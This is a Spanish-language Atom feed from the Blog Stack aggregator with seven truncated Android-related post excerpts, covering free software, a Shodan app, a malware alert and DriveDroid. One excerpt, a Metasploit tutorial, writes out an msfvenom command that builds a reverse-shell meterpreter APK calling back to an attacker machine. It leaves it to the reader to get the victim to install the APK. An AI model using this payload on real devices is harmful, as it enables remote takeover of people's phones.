<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <title>Blog Stack</title>
  <link rel="alternate" href="http://www.blogstack.info" />
  <subtitle>Un poco más que un agregador/planeta de bitácoras sobre programación, desarrollo, software libre, gnu/linux, tecnología, ...</subtitle>
  <updated>2015-08-18T10:02:18Z</updated>
  <dc:creator>Blog Stack</dc:creator>
  <dc:date>2015-08-18T10:02:18Z</dc:date>
  <dc:language>es</dc:language>
  <entry>
    <title>Software libre en el móvil</title>
    <link rel="alternate" href="http://www.blogstack.info/post/lasombradelhelicoptero/2015/08/software-libre-en-el-movil" />
    <category term="no-solo-linux" />
    <category term="android" />
    <category term="software-libre" />
    <author>
      <name>Enrique Bravo</name>
    </author>
    <updated>2015-08-18T09:42:21Z</updated>
    <published>2015-08-18T09:42:21Z</published>
    <content type="html">&lt;p&gt;Para salirme un poco de la rutina de revisiones de distribuciones GNU/Linux, veranos del camaleón y artículos similares, hoy me propongo abordar un tema algo distinto: la disponibilidad de programas y su validez – o no – para nuestros teléfonos móviles con Android. Me refiero, naturalmente, a software catalogado como libre, con código abierto que se puede revisar con objeto de cerciorarnos de que nuestra privacidad se mantiene, al menos, dentro de unos límites éticamente razonables. Asumiendo, desde la tristeza y la rotundidad “orwellianas”, que tal cosa no existe en términos absolutos en nuestro tiempo, todavía tenemos la posibilidad de utilizar una amplia variedad de programas que son respetuosos con nuestro derecho a la intimidad y a no ser usados como moneda de cambio publicitaria por grandes[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/lasombradelhelicoptero/2015/08/software-libre-en-el-movil"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Enrique Bravo</dc:creator>
    <dc:date>2015-08-18T09:42:21Z</dc:date>
  </entry>
  <entry>
    <title>Shodan.io – App para Android</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/07/shodan-io-app-para-android" />
    <category term="shodan" />
    <category term="ethical-hacking" />
    <category term="android" />
    <category term="seguridad" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-07-22T14:32:30Z</updated>
    <published>2015-07-22T14:32:30Z</published>
    <content type="html">&lt;p&gt;Todo profesional de seguridad conoce el buscador Shodan, que actualmente es muy utilizado para recopilar mucha información de objetivos por todo internet. Para los que no lo conocen Shodan es un buscador que escanea los canales de internet buscando servidores, routers, cámaras y todos los equipos que conforman la red de internet. Pueden obtener más información aquí. Pues recientemente se ha lanzado un aplicación para Android, que usando nuestra API key nos permite desde nuestro dispositivo explorar toda la información recopilada por Shodan.io con el fin de descubrir servicios expuestos por todo internet. Podemos realizar búsquedas usando términos específicos o las búsquedas que ya conocemos lo que usamos este buscador. La aplicación está bastante interesante, al lanzar la app nos pedirá la[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/07/shodan-io-app-para-android"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-07-22T14:32:30Z</dc:date>
  </entry>
  <entry>
    <title>Comprometiendo un Equipo Android con Metasploit</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/comprometiendo-un-equipo-android-con-metasploit" />
    <category term="metasploit" />
    <category term="ethical-hacking" />
    <category term="android" />
    <category term="seguridad" />
    <category term="msfvenom" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-16T22:13:52Z</updated>
    <published>2015-05-16T22:13:52Z</published>
    <content type="html">&lt;p&gt;Una de mis herramientas de seguridad favorita es Metasploit, y es por todas las funcionalidades que este framework nos da para realizar pruebas de seguridad a diversas plataformas. Hoy vamos a ver como podemos comprometer un equipo Android simplemente creando un APK malicioso que haga una conexión a nuestra máquina atacante, solo veremos lo de crear el ataque, la parte de lograr que su usuario instale y ejecute el APK, se los dejo a ustedes. Este post lo realizo usando, un Motorola con Android 4.4, Kali Linux y Metasploit. Para crear el APK Malicioso vamos a utilizar MSFvenom y nuestra máquina atacante es la 10.0.0.11 Creamos el Archivo Malicioso # msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.11 LPORT=4444 &gt; kali.apk Si verificamos, nos creo un archivo kali.apk, este es el que debemos[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/comprometiendo-un-equipo-android-con-metasploit"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-16T22:13:52Z</dc:date>
  </entry>
  <entry>
    <title>Android SparseBooleanArray y delete</title>
    <link rel="alternate" href="http://www.blogstack.info/post/arquitecturajava/2015/05/android-sparsebooleanarray-y-delete" />
    <category term="android" />
    <category term="android-conceptos" />
    <author>
      <name>Cecilio Álvarez Caules</name>
    </author>
    <updated>2015-05-13T15:38:07Z</updated>
    <published>2015-05-13T15:38:07Z</published>
    <content type="html">&lt;p&gt;Hoy voy a hablar de Android SparseBooleanArray. Si hay una tecnología Java que a veces es realmente complicada de entender es Android.  ¿Para que sirven los SparseBooleanArray?. Pues para algo teoricamente muy sencillo como es seleccionar los elementos seleccionados de un ListView. El problema es que en algunas ocasiones queremos eliminar los elementos seleccionados. Estructura del SparseBooleanArray ¿Cómo funciona exactamente esta clase? . El SparseBooleanArray es una clase optimizada para Android que almacena los elementos que hemos pulsado de nuestra lista. Por ejemplo si hemos pulsado dos elementos :   El SparseBooleanArray creará la siguiente estructura: La estructura dispondrá de  dos items y cada uno de ellos almacena la posición real en la lista del elemento seleccionado. Ahora bien[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/arquitecturajava/2015/05/android-sparsebooleanarray-y-delete"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Cecilio Álvarez Caules</dc:creator>
    <dc:date>2015-05-13T15:38:07Z</dc:date>
  </entry>
  <entry>
    <title>ALERTA!!! Descubierto Nuevo Malware para Android</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/02/alerta-descubierto-nuevo-malware-para-android" />
    <category term="seguridad" />
    <category term="malware" />
    <category term="android" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-02-20T20:01:23Z</updated>
    <published>2015-02-20T20:01:23Z</published>
    <content type="html">&lt;p&gt;Recientemente el personal de AVG Mobile Security descubrieron un malware en Android que toma control del proceso de apagado dejando el equipo totalmente funcional aun parezca que se encuentra apagado. El usuario hace el proceso normal de apagado y el equipo muestra la animación de apagado, sin embargo, el equipo permanece encendido permitiéndole a un usuario malintencionado llevar a cabo varias tareas como el de hacer llamadas y tomar fotografías. Visto por primera vez en China, el malware se propagaba a través de una aplicación y aproximadamente 10,000 dispositivos fueron infectados. Este Malware afecta versiones de Android antes de Lollipop (5.0) y requiere permisos de root para tomar control del proceso de apagado. Como funciona? Lo más importante es que necesita permisos de root, el malware[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/02/alerta-descubierto-nuevo-malware-para-android"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-02-20T20:01:23Z</dc:date>
  </entry>
  <entry>
    <title>HangoutON, Seguridad esencial en Android</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/01/hangouton-seguridad-esencial-en-android" />
    <category term="hangouton" />
    <category term="seguridad" />
    <category term="android" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-01-06T14:17:17Z</updated>
    <published>2015-01-06T14:17:17Z</published>
    <content type="html">&lt;p&gt;El Sistema operativo Android ha tomado mucha popularidad y se ha convertido en uno de los más utilizado. Esto lo convierte además en un objetivo atractivo para los cibercriminales y es por esto que debemos todas las medidas de lugar para proteger nuestro sistema y nuestra información. Este Jueves 8 de Enero, HangoutON tendrán un evento en directo, donde un grupo de profesionales en el área hablarán sobre las medidas de seguridad que debemos adoptar para proteger los dispositivos y la información que en ellos tenemos. Algunas de las cosas que verán, tomado del site de HangoutON: Porque ¿es necesario tener un antivirus en el dispositivo móvil? ¿qué otras medidas hay que tomar? ¿cómo se pueden configurar las barreras de seguridad que vienen por defecto? ¿es práctico activar la sesión multiusuario[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/01/hangouton-seguridad-esencial-en-android"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-01-06T14:17:17Z</dc:date>
  </entry>
  <entry>
    <title>DriveDroid; cómo arrancar cualquier Linux desde nuestro smartphone</title>
    <link rel="alternate" href="http://www.blogstack.info/post/laborategia/2014/10/drivedroid-como-arrancar-cualquier-linux-desde-nuestro-smartphone" />
    <category term="colaboracion" />
    <category term="cosas-que-hago" />
    <category term="blog-stack" />
    <category term="planeta-linux" />
    <category term="privacidad" />
    <category term="en-castellano" />
    <category term="android" />
    <category term="software-libre" />
    <category term="productividad" />
    <category term="linux" />
    <author>
      <name>Dabid Martinez</name>
    </author>
    <updated>2014-10-22T21:05:45Z</updated>
    <published>2014-10-22T21:05:45Z</published>
    <content type="html">&lt;p&gt;¿Cuantas veces has tenido que iniciar un Live CD de Linux para instalar o recuperar un sistema y no has tenido el lapiz USB preparado? ¿y cuantas veces no has tenido siquiera un lapiz USB a mano? Y ni mencionar de aquellas en las que no has tenido conexión a Internet para descargarte la ISO. Pues bien DriveDroid ha venido a solucionarnos esos problemas. Es un aplicación para Android que nos permite arrancar cualquier sistema operativo con base Linux (he visto por ahi que alguien ha arrancado Windows) desde nuestro teléfono móvil. Por que si hay algo que no olvidamos al salir de nuestra casa eso el… el móvil y el tabaco. Puede resultar una aplicación muy cómoda para geeks y no tan geeks, tener la posibilidad de arrancar cualquier distribución de Linux simplemente sacado el smartphone de nuestro[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/laborategia/2014/10/drivedroid-como-arrancar-cualquier-linux-desde-nuestro-smartphone"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Dabid Martinez</dc:creator>
    <dc:date>2014-10-22T21:05:45Z</dc:date>
  </entry>
</feed>

